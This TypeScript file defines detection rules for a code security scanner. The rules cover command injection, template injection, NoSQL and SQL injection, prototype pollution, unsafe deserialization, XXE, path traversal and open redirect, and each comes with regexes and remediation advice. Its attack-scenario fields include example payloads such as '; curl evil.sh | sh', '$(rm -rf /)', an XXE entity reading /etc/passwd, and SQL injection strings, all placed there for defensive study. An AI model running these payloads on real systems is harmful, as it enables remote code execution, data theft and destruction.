import { FileRule } from '../types';

export const injectionRules: FileRule[] = [
  {
    id: 'INJ_001',
    title: 'Command Injection via child_process com interpolação/concatenação',
    category: 'Injeção e Execução',
    severity: 'critical',
    confidence: 'high',
    description: 'exec/execSync recebendo template literal com ${...} ou string concatenada com variável.',
    impact: 'Execução arbitrária de comandos no servidor (RCE), comprometimento total do host.',
    attackScenarioDefensive: 'Atacante injeta "; curl evil.sh | sh" num parâmetro interpolado no comando shell, executando código arbitrário no servidor.',
    remediation: 'Use execFile/spawn com array de argumentos (sem shell) e valide o input contra uma allowlist.',
    safeExample: "const { execFile } = require('child_process');\nexecFile('git', ['clone', repoUrl], cb); // sem shell, args separados",
    testSuggestion: 'Enviar payload com ; e && em um campo interpolado e confirmar que não há execução de comandos extras.',
    reference: 'OWASP A03:2021; CWE-78; CVE-2026-47367',
    patterns: [
      /\b(?:child_process\.)?(?:exec|execSync)\s*\(\s*`[^`]*\$\{/,
      /\b(?:child_process\.)?(?:exec|execSync)\s*\([^)]*["'`]\s*\+\s*[A-Za-z_$]/,
    ],
    fileExtensions: ['.js', '.ts', '.mjs', '.cjs'],
  },
  {
    id: 'INJ_002',
    title: 'Command Injection em Python (os.system/subprocess shell=True)',
    category: 'Injeção e Execução',
    severity: 'critical',
    confidence: 'high',
    description: 'os.system/os.popen com f-string ou concatenação, ou subprocess com shell=True recebendo input do usuário.',
    impact: 'Execução arbitrária de comandos no servidor (RCE), comprometimento total do host.',
    attackScenarioDefensive: 'Atacante envia "$(rm -rf /)" ou "; cat /etc/passwd" num campo interpolado na f-string do comando shell.',
    remediation: 'Use subprocess.run com lista de argumentos e shell=False (padrão). Nunca monte o comando por concatenação/f-string.',
    safeExample: "import subprocess\nsubprocess.run(['git', 'clone', repo_url], shell=False, check=True)",
    testSuggestion: 'Enviar payload com ; $() e && em um campo que chega ao comando e confirmar que não há execução extra.',
    reference: 'OWASP A03:2021; CWE-78',
    patterns: [
      /\bos\.(?:system|popen)\s*\(\s*f["']/,
      /\bos\.(?:system|popen)\s*\([^)]*["']\s*\+/,
      /\bsubprocess\.(?:run|call|Popen|check_output|check_call)\s*\([^)]*shell\s*=\s*True/,
    ],
    fileExtensions: ['.py'],
  },
  {
    id: 'INJ_003',
    title: 'Command Injection em PHP/Java (shell_exec/Runtime.exec)',
    category: 'Injeção e Execução',
    severity: 'critical',
    confidence: 'medium',
    description: 'shell_exec/passthru/system/popen em PHP com variável, ou Runtime.getRuntime().exec com concatenação em Java.',
    impact: 'Execução arbitrária de comandos no servidor (RCE), comprometimento total do host.',
    attackScenarioDefensive: 'Atacante injeta metacaracteres de shell (; | &&) numa variável que é concatenada no comando passado a shell_exec ou exec.',
    remediation: 'Em PHP, use escapeshellarg/escapeshellcmd ou evite shell. Em Java, use ProcessBuilder com lista de argumentos, sem shell.',
    safeExample: "// Java seguro:\nnew ProcessBuilder(\"git\", \"clone\", repoUrl).start();\n// PHP seguro:\n$out = shell_exec('ls ' . escapeshellarg($dir));",
    testSuggestion: 'Injetar ; e | em variáveis que alcançam o comando e confirmar que não há execução adicional.',
    reference: 'OWASP A03:2021; CWE-78',
    patterns: [
      /\b(?:shell_exec|passthru|system|popen)\s*\(\s*[^)]*\$[A-Za-z_]/,
      /\bRuntime\.getRuntime\(\)\.exec\s*\([^)]*\+/,
    ],
    fileExtensions: ['.php', '.java'],
  },
  {
    id: 'INJ_004',
    title: 'SSTI em Node (template compilado a partir de input)',
    category: 'Injeção e Execução',
    severity: 'critical',
    confidence: 'medium',
    description: 'Engine de template (pug/handlebars/ejs/nunjucks/lodash) compilando ou renderizando string vinda do usuário.',
    impact: 'Server-Side Template Injection levando a RCE ou exfiltração de dados via acesso ao contexto do servidor.',
    attackScenarioDefensive: 'Atacante envia uma expressão de template (ex.: #{process.mainModule.require("child_process")...}) que é compilada e executada no servidor.',
    remediation: 'Nunca compile templates a partir de input do usuário. Trate o input apenas como dado passado ao contexto de um template fixo.',
    safeExample: "const html = pug.renderFile('view.pug', { nome: req.body.nome }); // template fixo, input como dado",
    testSuggestion: 'Enviar payloads de SSTI específicos da engine (ex.: {{7*7}}, #{...}) e verificar se não são avaliados.',
    reference: 'OWASP A03:2021; CWE-1336',
    patterns: [
      /\b(?:pug|handlebars|ejs|nunjucks|_)\.(?:compile|render|template)\s*\([^)]*(?:req\.|body\.|params\.|query\.)/,
      /\bnunjucks\.renderString\s*\([^)]*(?:req\.|body\.|params\.|query\.)/,
    ],
    fileExtensions: ['.js', '.ts', '.mjs', '.cjs'],
  },
  {
    id: 'INJ_005',
    title: 'SSTI em Python (render_template_string/Template com input)',
    category: 'Injeção e Execução',
    severity: 'critical',
    confidence: 'high',
    description: 'render_template_string ou Template do Jinja2 recebendo string montada com f-string, %, .format() ou concatenação.',
    impact: 'Server-Side Template Injection no Jinja2 levando a RCE via acesso a __globals__ e módulos do servidor.',
    attackScenarioDefensive: 'Atacante envia {{ config.__class__.__init__.__globals__ }} que, interpolado no template, expõe segredos ou executa código.',
    remediation: 'Use render_template com arquivos de template fixos e passe o input do usuário apenas como variável de contexto.',
    safeExample: "from flask import render_template\nreturn render_template('hello.html', nome=request.args.get('nome'))",
    testSuggestion: 'Enviar {{7*7}} e {{config}} e confirmar que aparecem literalmente, sem avaliação.',
    reference: 'OWASP A03:2021; CWE-1336',
    patterns: [
      /\brender_template_string\s*\(\s*[^)]*(?:f["']|%|\.format\(|\+)/,
      /\bTemplate\s*\(\s*[^)]*(?:f["']|request\.|\.format\(|\+)/,
    ],
    fileExtensions: ['.py'],
  },
  {
    id: 'INJ_006',
    title: 'NoSQL Injection (Mongo $where / req.body em query)',
    category: 'Injeção e Execução',
    severity: 'high',
    confidence: 'medium',
    description: 'Uso de operador $where com interpolação, ou passagem direta de req.body/query/params como filtro de consulta MongoDB.',
    impact: 'Bypass de autenticação e exfiltração de dados via operadores NoSQL ($ne, $gt, $where com JavaScript).',
    attackScenarioDefensive: 'Atacante envia { "senha": { "$ne": null } } no corpo, que vira filtro e retorna usuários sem conhecer a senha.',
    remediation: 'Valide e converta os tipos do input. Nunca passe objetos do usuário diretamente como filtro; use $eq explícito e schemas (ex.: mongoose).',
    safeExample: "const user = await User.findOne({ email: String(req.body.email) }); // tipo forçado a string",
    testSuggestion: 'Enviar operadores como {"$ne":null} ou {"$gt":""} nos campos e confirmar que são rejeitados/tratados como string.',
    reference: 'OWASP A03:2021; CWE-943',
    patterns: [
      /\$where\s*:\s*[`"']?[^,}]*\$\{/,
      /\.(?:find|findOne|update(?:One|Many)?|delete(?:One|Many)?)\s*\(\s*(?:req\.body|req\.query|req\.params)\b/,
    ],
    fileExtensions: ['.js', '.ts', '.mjs', '.cjs'],
  },
  {
    id: 'INJ_007',
    title: 'Prototype Pollution via merge/extend recursivo',
    category: 'Injeção e Execução',
    severity: 'high',
    confidence: 'medium',
    description: 'merge/mergeWith/defaultsDeep/deepmerge/extend ou Object.assign recebendo req.body/query/params ou JSON.parse.',
    impact: 'Poluição de Object.prototype que pode causar DoS, bypass de lógica e até RCE dependendo do gadget disponível.',
    attackScenarioDefensive: 'Atacante envia {"__proto__":{"isAdmin":true}} que é mesclado recursivamente, contaminando todos os objetos da aplicação.',
    remediation: 'Use merge seguro que ignore __proto__/constructor/prototype, ou Object.create(null). Atualize libs vulneráveis (lodash).',
    safeExample: "// Bloqueie chaves perigosas antes de mesclar:\nif (['__proto__','constructor','prototype'].includes(key)) continue;",
    testSuggestion: 'Enviar {"__proto__":{"polluted":true}} e verificar que ({}).polluted continua undefined.',
    reference: 'OWASP A08:2021; CWE-1321',
    patterns: [
      /\b(?:_\.(?:merge|mergeWith|defaultsDeep|set)|deepmerge|extend)\s*\([^)]*(?:req\.body|req\.query|req\.params)\b/,
      /\bObject\.assign\s*\(\s*[A-Za-z_$][\w$]*\s*,\s*(?:req\.body|req\.query|JSON\.parse)/,
    ],
    fileExtensions: ['.js', '.ts', '.mjs', '.cjs'],
  },
  {
    id: 'INJ_008',
    title: 'Prototype Pollution: escrita por chave dinâmica em __proto__',
    category: 'Injeção e Execução',
    severity: 'high',
    confidence: 'medium',
    description: 'Atribuição em objeto usando chave dinâmica controlada pelo usuário sem checar __proto__/constructor.',
    impact: 'Poluição de protótipo via escrita por índice dinâmico, contaminando objetos globais.',
    attackScenarioDefensive: 'Atacante controla "key" com valor "__proto__" e a escrita obj[key] = valor contamina o protótipo.',
    remediation: 'Valide a chave contra uma allowlist e rejeite __proto__/constructor/prototype. Prefira Map em vez de objeto literal.',
    safeExample: "if (['__proto__','constructor','prototype'].includes(key)) return;\nobj[key] = value;",
    testSuggestion: 'Definir key="__proto__" e confirmar que a escrita é bloqueada e o protótipo permanece intacto.',
    reference: 'OWASP A08:2021; CWE-1321',
    patterns: [
      /\[\s*(?:req\.|body\.|params\.|query\.|key|prop|path)[^\]]*\]\s*\[\s*["'`]__proto__["'`]\s*\]/,
      /\[\s*(?:key|prop|k|path|segment)\s*\]\s*=\s*(?!.*hasOwnProperty)/,
    ],
    fileExtensions: ['.js', '.ts', '.mjs', '.cjs'],
  },
  {
    id: 'INJ_009',
    title: 'Deserialização insegura em Node (node-serialize.unserialize)',
    category: 'Injeção e Execução',
    severity: 'critical',
    confidence: 'high',
    description: 'Uso da biblioteca node-serialize e de serialize.unserialize, que executa funções imediatamente invocadas embutidas.',
    impact: 'Remote Code Execution: payloads com _$$ND_FUNC$$_ são executados durante a desserialização.',
    attackScenarioDefensive: 'Atacante envia objeto serializado com função IIFE que executa require("child_process").exec ao ser desserializado.',
    remediation: 'Não use node-serialize para dados não confiáveis. Use JSON.parse para dados e nunca desserialize código.',
    safeExample: "const data = JSON.parse(input); // apenas dados, nunca funções",
    testSuggestion: 'Enviar payload com _$$ND_FUNC$$_ e confirmar que não há execução (idealmente, remover a dependência).',
    reference: 'OWASP A08:2021; CWE-502',
    patterns: [
      /require\(\s*["'`]node-serialize["'`]\s*\)/,
      /\bserialize\.unserialize\s*\(/,
    ],
    fileExtensions: ['.js', '.ts', '.mjs', '.cjs'],
  },
  {
    id: 'INJ_010',
    title: 'Deserialização insegura em Python (pickle/yaml.load)',
    category: 'Injeção e Execução',
    severity: 'critical',
    confidence: 'high',
    description: 'pickle.load/loads ou yaml.load sem Loader seguro, que instanciam objetos arbitrários a partir do payload.',
    impact: 'Remote Code Execution via __reduce__ no pickle ou tags !!python/object no YAML.',
    attackScenarioDefensive: 'Atacante envia pickle malicioso cujo __reduce__ chama os.system, executando comandos ao desserializar.',
    remediation: 'Nunca desserialize dados não confiáveis com pickle. Use yaml.safe_load. Para dados, prefira JSON.',
    safeExample: "import yaml\ndata = yaml.safe_load(untrusted_input) # nunca yaml.load sem SafeLoader",
    testSuggestion: 'Enviar payload pickle/YAML com __reduce__ ou !!python/object e confirmar que é rejeitado.',
    reference: 'OWASP A08:2021; CWE-502',
    patterns: [
      /\bpickle\.(?:load|loads)\s*\(/,
      /\byaml\.load\s*\([^)]*\)(?![^)]*Loader\s*=)/,
    ],
    fileExtensions: ['.py'],
  },
  {
    id: 'INJ_011',
    title: 'Deserialização insegura em PHP/Java (unserialize/ObjectInputStream)',
    category: 'Injeção e Execução',
    severity: 'high',
    confidence: 'medium',
    description: 'unserialize() de PHP sobre variável do usuário, ou new ObjectInputStream em Java sobre dados não confiáveis.',
    impact: 'Object injection / gadget chains levando a RCE ou manipulação de estado da aplicação.',
    attackScenarioDefensive: 'Atacante fornece string serializada que, ao ser desserializada, dispara uma cadeia de gadgets (POP chain) executando código.',
    remediation: 'Não desserialize dados não confiáveis. Em PHP use JSON; em Java, use formatos seguros e listas de classes permitidas (ObjectInputFilter).',
    safeExample: "// PHP: use JSON em vez de unserialize\n$data = json_decode($input, true);",
    testSuggestion: 'Fornecer payload de gadget conhecido e confirmar que a desserialização é bloqueada ou filtrada.',
    reference: 'OWASP A08:2021; CWE-502',
    patterns: [
      /\bunserialize\s*\(\s*\$[A-Za-z_]/,
      /new\s+ObjectInputStream\s*\(/,
    ],
    fileExtensions: ['.php', '.java'],
  },
  {
    id: 'INJ_012',
    title: 'XXE: parser XML sem desabilitar entidades externas',
    category: 'Injeção e Execução',
    severity: 'high',
    confidence: 'low',
    description: 'Criação de parser XML (DocumentBuilderFactory/SAXParserFactory/XMLInputFactory) ou uso de LIBXML_NOENT / libxml_disable_entity_loader(false).',
    impact: 'XML External Entity (XXE): leitura de arquivos locais, SSRF e DoS via entidades externas.',
    attackScenarioDefensive: 'Atacante envia XML com <!ENTITY xxe SYSTEM "file:///etc/passwd"> e o parser resolve a entidade, vazando o arquivo.',
    remediation: 'Desabilite DTD e entidades externas: setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) em Java; não use LIBXML_NOENT.',
    safeExample: "DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();\ndbf.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true);",
    testSuggestion: 'Enviar XML com entidade externa apontando para file:// e confirmar que não é resolvida.',
    reference: 'OWASP A05:2021; CWE-611',
    patterns: [
      /\b(?:DocumentBuilderFactory|SAXParserFactory|XMLInputFactory)\.newInstance\s*\(/,
      /\bLIBXML_NOENT\b/,
      /libxml_disable_entity_loader\s*\(\s*false\s*\)/,
    ],
    fileExtensions: ['.java', '.php'],
  },
  {
    id: 'INJ_013',
    title: 'Path Traversal em Node (req.* em caminho de arquivo)',
    category: 'Injeção e Execução',
    severity: 'high',
    confidence: 'medium',
    description: 'Operações de filesystem (fs.readFile/writeFile/unlink, res.sendFile, path.join) usando req.params/query/body no caminho.',
    impact: 'Leitura/escrita de arquivos arbitrários fora do diretório esperado via sequências ../.',
    attackScenarioDefensive: 'Atacante envia "../../etc/passwd" no parâmetro de nome de arquivo e a aplicação lê e devolve o conteúdo.',
    remediation: 'Normalize com path.resolve e verifique que o caminho final está dentro do diretório base; use basename e uma allowlist.',
    safeExample: "const safe = path.resolve(BASE, path.basename(req.params.file));\nif (!safe.startsWith(BASE)) return res.sendStatus(400);",
    testSuggestion: 'Enviar "../" e "..%2f" no parâmetro e confirmar que o acesso fica restrito ao diretório base.',
    reference: 'OWASP A01:2021; CWE-22',
    patterns: [
      /\bfs\.(?:readFile|readFileSync|createReadStream|writeFile|writeFileSync|unlink)\s*\([^)]*(?:req\.params|req\.query|req\.body)\b/,
      /\b(?:res\.sendFile|path\.join)\s*\([^)]*(?:req\.params|req\.query|req\.body)\b/,
    ],
    fileExtensions: ['.js', '.ts', '.mjs', '.cjs'],
  },
  {
    id: 'INJ_014',
    title: 'Path Traversal em Python (open() com request)',
    category: 'Injeção e Execução',
    severity: 'high',
    confidence: 'medium',
    description: 'open() ou os.path.join recebendo request.args/form/json/values/files no caminho do arquivo.',
    impact: 'Leitura/escrita de arquivos arbitrários fora do diretório esperado via sequências ../.',
    attackScenarioDefensive: 'Atacante envia "../../../etc/passwd" no parâmetro e a aplicação abre e retorna o arquivo.',
    remediation: 'Use os.path.basename e valide o caminho resolvido (os.path.realpath) contra um diretório base permitido.',
    safeExample: "import os\nbase = '/app/uploads'\npath = os.path.realpath(os.path.join(base, os.path.basename(request.args['f'])))\nif not path.startswith(base): abort(400)",
    testSuggestion: 'Enviar "../" e caminhos absolutos no parâmetro e confirmar que o acesso fica restrito ao diretório base.',
    reference: 'OWASP A01:2021; CWE-22',
    patterns: [
      /\bopen\s*\(\s*[^)]*request\.(?:args|form|json|values|files)\b/,
      /\bos\.path\.join\s*\([^)]*request\.(?:args|form|json|values)\b/,
    ],
    fileExtensions: ['.py'],
  },
  {
    id: 'INJ_015',
    title: 'Execução dinâmica (timers com string / vm.* com input)',
    category: 'Injeção e Execução',
    severity: 'critical',
    confidence: 'high',
    description: 'setTimeout/setInterval recebendo string com interpolação, ou vm.runInNewContext/runInThisContext/compileFunction com input do usuário.',
    impact: 'Execução de código arbitrário (RCE), pois strings em timers e vm.* equivalem a eval.',
    attackScenarioDefensive: 'Atacante injeta código numa string interpolada passada a setTimeout ou ao contexto de vm, executando comandos no servidor.',
    remediation: 'Passe sempre uma função (não string) para timers. Não use o módulo vm com input não confiável; use sandboxes isoladas de processo se necessário.',
    safeExample: "setTimeout(() => doWork(value), 1000); // função, nunca string",
    testSuggestion: 'Injetar payload em campos que chegam a timers/vm e confirmar que não há avaliação de código.',
    reference: 'OWASP A03:2021; CWE-95',
    patterns: [
      /\b(?:setTimeout|setInterval)\s*\(\s*["'`][^"'`]*\$\{/,
      /\bvm\.(?:runInNewContext|runInThisContext|compileFunction)\s*\([^)]*(?:req\.|body\.|params\.|query\.)/,
    ],
    fileExtensions: ['.js', '.ts', '.mjs', '.cjs'],
  },
  {
    id: 'RED_001',
    title: 'Open Redirect (res.redirect com input do usuário)',
    category: 'Injeção e Execução',
    severity: 'medium',
    confidence: 'medium',
    description: 'res.redirect recebendo diretamente req.query/body/params como destino do redirecionamento.',
    impact: 'Open Redirect: redireciona vítimas para sites maliciosos, facilitando phishing e roubo de tokens OAuth.',
    attackScenarioDefensive: 'Atacante envia ?next=https://evil.com e a aplicação redireciona a vítima autenticada para o site controlado pelo atacante.',
    remediation: 'Valide o destino contra uma allowlist de URLs/paths internos. Permita apenas caminhos relativos que comecem com "/".',
    safeExample: "const next = req.query.next;\nif (typeof next === 'string' && next.startsWith('/') && !next.startsWith('//')) res.redirect(next);\nelse res.redirect('/');",
    testSuggestion: 'Enviar URLs absolutas externas e //evil.com no parâmetro e confirmar que o redirecionamento é bloqueado.',
    reference: 'OWASP A01:2021; CWE-601',
    patterns: [
      /\bres\.redirect\s*\(\s*(?:req\.query|req\.body|req\.params)\b/,
      /\bres\.redirect\s*\([^)]*(?:req\.query|req\.body|req\.params)\.[A-Za-z_]/,
    ],
    fileExtensions: ['.js', '.ts', '.mjs', '.cjs'],
  },
  {
    id: 'INJ_016',
    title: 'SQL Injection por concatenação (complemento Python/.raw)',
    category: 'Injeção e Execução',
    severity: 'critical',
    confidence: 'medium',
    description: 'query/execute/raw com string SQL contendo interpolação ${...} com input ou concatenação com req./input.',
    impact: 'SQL Injection: acesso não autorizado, exfiltração ou destruição de dados.',
    attackScenarioDefensive: 'Atacante envia "1 OR 1=1 --" num campo concatenado na query, contornando filtros e retornando todos os registros.',
    remediation: 'Use sempre queries parametrizadas / placeholders, ou os helpers seguros do ORM. Nunca concatene input na string SQL.',
    safeExample: "// Parametrizado:\nawait db.query('SELECT * FROM users WHERE id = $1', [userId]);\n# Python:\ncursor.execute('SELECT * FROM users WHERE id = %s', (user_id,))",
    testSuggestion: "Enviar payloads como ' OR '1'='1 e \"; DROP TABLE-- e confirmar que são tratados como dados literais.",
    reference: 'OWASP A03:2021; CWE-89',
    patterns: [
      /(?:query|execute|raw)\s*\(\s*[`"'][^`"']*(?:SELECT|INSERT|UPDATE|DELETE)[\s\S]{0,200}?(?:\$\{[^}]*(?:req\.|input|userId|params)|["']\s*\+\s*(?:req\.|input))/i,
    ],
    fileExtensions: ['.js', '.ts', '.py', '.mjs'],
  },
];
